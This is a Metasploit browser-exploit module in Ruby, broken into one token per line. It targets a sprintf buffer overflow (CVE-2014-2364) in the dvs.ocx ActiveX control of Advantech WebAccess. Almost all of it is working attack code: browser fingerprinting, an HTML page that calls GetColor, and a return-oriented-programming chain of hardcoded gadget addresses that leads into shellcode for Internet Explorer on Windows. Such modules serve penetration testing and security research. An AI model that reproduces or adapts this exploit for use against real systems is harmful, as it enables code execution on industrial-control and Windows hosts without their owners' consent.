require
'msf/core'
class
Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'Advantech WebAccess dvs.ocx GetColor Buffer Overflow'
,
'Description'
=> %q{
This
module
exploits a buffer overflow vulnerability
in
Advantec WebAccess. The
vulnerability exists
in
the dvs.ocx ActiveX control, where a dangerous call to
sprintf can be reached with user controlled data through the GetColor function.
This
module
has been tested successfully on Windows
XP
SP3
with
IE6
and
Windows
7
SP1
with
IE8
and
IE
9
.
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'Unknown'
,
'juan vazquez'
],
'References'
=>
[
[
'CVE'
,
'2014-2364'
],
[
'ZDI'
,
'14-255'
],
[
'URL'
,
'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'
]
],
'DefaultOptions'
=>
{
'Retries'
=>
false
,
'InitialAutoRunScript'
=>
'migrate -f'
},
'BrowserRequirements'
=>
{
:source
=> /script|headers/i,
:os_name
=> Msf::OperatingSystems::
WINDOWS
,
:ua_name
=> /
MSIE
/i,
:ua_ver
=> lambda { |ver| Gem::Version.
new
(ver) < Gem::Version.
new
(
'10'
) },
:clsid
=>
"{5CE92A27-9F6A-11D2-9D3D-000001155641}"
,
:method
=>
"GetColor"
},
'Payload'
=>
{
'Space'
=>
1024
,
'DisableNops'
=>
true
,
'BadChars'
=>
"\x00\x0a\x0d\x5c"
,
'PrependEncoder'
=>
"\x81\xc4\x9c\xff\xff\xff"
,
'Prepend'
=>
"\x64\xa1\x18\x00\x00\x00"
+
"\x83\xC0\x08"
+
"\x8b\x20"
+
"\x81\xC4\x30\xF8\xFF\xFF"
},
'Platform'
=>
'win'
,
'Arch'
=>
ARCH_X86
,
'Targets'
=>
[
[
'Automatic'
, { } ]
],
'DefaultTarget'
=>
0
,
'DisclosureDate'
=>
'Jul 17 2014'
))
end
def
on_request_exploit(cli, request, target_info)
print_status(
"Requested: #{request.uri}"
)
content = <<-
EOS
<html>
<head>
<meta http-equiv=
"cache-control"
content=
"max-age=0"
/>
<meta http-equiv=
"cache-control"
content=
"no-cache"
/>
<meta http-equiv=
"expires"
content=
"0"
/>
<meta http-equiv=
"expires"
content=
"Tue, 01 Jan 1980 1:00:00 GMT"
/>
<meta http-equiv=
"pragma"
content=
"no-cache"
/>
</head>
<body>
<object classid=
'clsid:5CE92A27-9F6A-11D2-9D3D-000001155641'
id=
'test'
/></object>
<script language=
'javascript'
>
test.GetColor(
"#{rop_payload(get_payload(cli, target_info))}"
,
0
);
</script>
</body>
</html>
EOS
print_status(
"Sending #{self.name}"
)
send_response_html(cli, content, {
'Pragma'
=>
'no-cache'
})
end
def
rop_payload(code)
xpl = rand_text_alphanumeric(
61
)
xpl << [0x60014185].pack(
"V"
)
xpl << rand_text_alphanumeric(
8
)
xpl << [0x60012288].pack(
"V"
)
xpl << [0xffffffff].pack(
"V"
)
xpl << [0x6002157e].pack(
"V"
)
xpl << [0x9ffdafc9].pack(
"V"
)
xpl << [0x60022b97].pack(
"V"
)
xpl << [0x60024ea4].pack(
"V"
)
xpl << [0x60018084].pack(
"V"
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << [0x60029f6c].pack(
"V"
)
xpl << [0x60012288].pack(
"V"
)
xpl << [0x60023588].pack(
"V"
)
xpl << [0x6001f1c8].pack(
"V"
)
xpl << [0x60012288].pack(
"V"
)
xpl << [0xffffffff].pack(
"V"
)
xpl << [0x6002157e].pack(
"V"
)
xpl << [0x9ffdbf89].pack(
"V"
)
xpl << [0x60022b97].pack(
"V"
)
xpl << [0x60024ea4].pack(
"V"
)
xpl << [0x6002157e].pack(
"V"
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << rand_text_alphanumeric(
4
)
xpl << [0x60029f6c].pack(
"V"
)
xpl << [0x60012288].pack(
"V"
)
xpl << [0xffffffff].pack(
"V"
)
0x41.times
do
xpl << [0x6001b8ec].pack(
"V"
)
end
xpl << [0x6001db7e].pack(
"V"
)
xpl << [0x600250c8].pack(
"V"
)
xpl << [0x6002054b].pack(
"V"
)
xpl << [0x6002054b].pack(
"V"
)
xpl << [0x600181cc].pack(
"V"
)
xpl << [0x6002176e].pack(
"V"
)
xpl << [0x60021ad1].pack(
"V"
)
xpl << [0x60021ad2].pack(
"V"
)
xpl << [0x60018399].pack(
"V"
)
xpl << [0x6001c5cd].pack(
"V"
)
xpl << code
xpl.gsub!(
"\""
,
"\\\""
)
xpl.gsub!(
"\\"
,
"\\\\"
)
xpl
end
end